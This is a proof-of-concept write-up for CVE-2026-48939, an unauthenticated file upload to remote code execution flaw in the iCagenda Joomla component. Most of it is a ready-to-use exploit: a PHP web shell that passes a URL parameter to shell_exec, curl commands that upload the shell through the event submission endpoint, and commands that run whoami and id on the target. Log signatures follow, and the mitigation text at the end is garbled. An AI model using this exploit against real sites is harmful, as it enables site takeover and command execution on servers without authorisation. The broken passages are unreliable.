
iCagenda Unauthenticated File Upload to RCE
| Field | Value |
|---|---|
| CVE ID | CVE-2026-48939 |
| CVSS 4.0 Score | 10.0 Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-284: Improper Access Control |
| Affected Versions | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| Fixed In | iCagenda 4.0.8 and 3.9.15 |
| Published | 20 June 2026 |
iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.
The vulnerability exists in the frontend event submission form's file attachment feature:
Missing Access Control: The submit endpoint (index.php?option=com_icagenda&task=registration.submit) does not enforce authentication, bypassing the "Registered Only" access setting.
No File Validation: Uploaded files are saved with their original extension without:
Direct File Write: Files are written to /images/icagenda/frontend/attachments/[filename] directly under the web root.
PHP Execution: On Joomla 6, the uploaded .php files are executable, leading to Remote Code Execution (RCE).
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF
# Upload the shell
curl -k -s \
-F "title=Test Event" \
-F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
"https://poloss-jomola.ddev.site/icagenda_submit.php"
# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
# Navigate to project directory
# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
Identify vulnerable endpoint:
https://target.com/index.php?option=com_icagenda&task=submit
Upload PHP web shell:
curl -X POST -F "jform[attachment][email protected]" \
"https://target.com/index.php?option=com_icagenda&task=submit"
Execute shell:
curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
Based on real-world exploitation logs, the attack signature is:
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"
# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
com_icagenda folders temporarilyThis PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.